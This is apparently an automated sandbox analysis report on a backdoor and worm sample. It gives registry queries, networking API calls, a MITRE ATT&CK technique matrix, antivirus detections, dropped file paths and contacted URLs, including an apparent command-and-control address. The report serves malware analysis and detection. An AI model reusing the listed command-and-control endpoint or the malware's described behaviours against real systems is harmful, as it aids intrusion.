Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 11_2_100100A0 GetLocalTime,SystemTimeToFileTime,

11_2_100100A0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 11_2_10006BF0 Sleep,GetVersionExA,CreateThread,sprintf,

11_2_10006BF0

Stealing of Sensitive Information

Queries disk data (e.g. SMART data)

Source: C:\Windows\SysWOW64\rundll32.exe

Device IO: \Device\Harddisk0\DR0

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 11_2_100055E0 WSAStartup,socket,socket,socket,htons,htons,inet_addr,inet_addr,htons,inet_addr,bind,ioctlsocket,select,Sleep,wsprintfA,malloc,htons,htons,htons,htons,htons,htons,htons,inet_addr,closesocket,closesocket,closesocket,

11_2_100055E0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	11 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Bootkit	111 Process Injection	3 Obfuscated Files or Information	Security Account Manager	124 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	11 Registry Run Keys / Startup Folder	1 Software Packing	NTDS	11 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	21 Virtualization/Sandbox Evasion	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Virtualization/Sandbox Evasion	DCSync	11 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Bootkit	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Rundll32	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
peks66Iy06.exe	82%	ReversingLabs	Win32.Backdoor.Venik
peks66Iy06.exe	100%	Avira	TR/Dropper.Gen
peks66Iy06.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\nfxboms.exe	100%	Avira	TR/Dropper.Gen
C:\ijbbn\gduol.dll	100%	Joe Sandbox ML
C:\nfxboms.exe	100%	Joe Sandbox ML
C:\ijbbn\gduol.dll	92%	ReversingLabs	Win32.Worm.Palevo

Source	Detection	Scanner	Label
http://107.163.241.232:12354/show.phpw6x	0%	Avira URL Cloud	safe
http://107.163.241.232:12354/show.phpG6	0%	Avira URL Cloud	safe
http://107.163.241.232:12354/show.phpY6	0%	Avira URL Cloud	safe
http://107.163.241.232:12354/show.phpc6l	0%	Avira URL Cloud	safe
http://192.168.100.83/9.htmhttp://192.168.100.83/F.htm%D	0%	Avira URL Cloud	safe
http://107.163.241.232:12354/show.phpfiguration	0%	Avira URL Cloud	safe
http://107.163.241.232:12354/show.php	0%	Avira URL Cloud	safe
http://107.163.241.232:12354/show.phpge	0%	Avira URL Cloud	safe
http://192.168.100.83/9.htm	0%	Avira URL Cloud	safe
http://192.168.100.83/F.htm	0%	Avira URL Cloud	safe
http://107.163.241.232:12354/show.php_6	0%	Avira URL Cloud	safe
http://192.168.100.83/	0%	Avira URL Cloud	safe
http://107.163.241.232:12354/show.phpcom	0%	Avira URL Cloud	safe
http://www.1.com	0%	Avira URL Cloud	safe
http://107.163.241.232:12354/show.phpbat	0%	Avira URL Cloud	safe
http://107.163.241.232:12354/show.phpU6	0%	Avira URL Cloud	safe
http://107.163.241.232:12354/show.phpurce	0%	Avira URL Cloud	safe
http://107.163.241.232:12354/show.phpc	0%	Avira URL Cloud	safe
http://107.163.241.232:12354/show.phpm6b	0%	Avira URL Cloud	safe
http://107.163.241.232:12354/show.phpw	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
blogx.sina.com.cn	202.108.0.52	true	false	high
krnaver.com	unknown	unknown	true	unknown
blog.sina.com.cn	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://107.163.241.232:12354/show.php	true	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/5655029807	false		high
https://blog.sina.com.cn/u/5655029807	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://107.163.241.232:12354/show.phpY6	rundll32.exe, 0000000B.00000003.1630964432.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1873391879.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1955205499.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1524675338.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1898568635.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1874878565.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1996535082.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2479584345.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1831626210.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2461344495.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3415368904.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1790546741.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2023510494.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2706492853.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2765318148.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1749224254.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1658959024.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1709224291.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1524304026.0000000005E57000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/5655029807zA6	rundll32.exe, 0000000B.00000003.2479584345.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2461344495.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3415368904.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2765318148.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blog.sina.com.cn/u/5655029807player	rundll32.exe, 0000000B.00000003.2765318148.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	false		high
http://107.163.241.232:12354/show.phpc6l	rundll32.exe, 0000000B.00000003.1630964432.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2352322390.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1873391879.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1955205499.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1524675338.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1898568635.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1874878565.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3298966343.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1996535082.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1831626210.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3171831439.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3032265357.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2266852076.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2294693416.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2302222734.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3415368904.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1790546741.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2023510494.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2706492853.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2898885834.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2598064814.0000000005E53000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
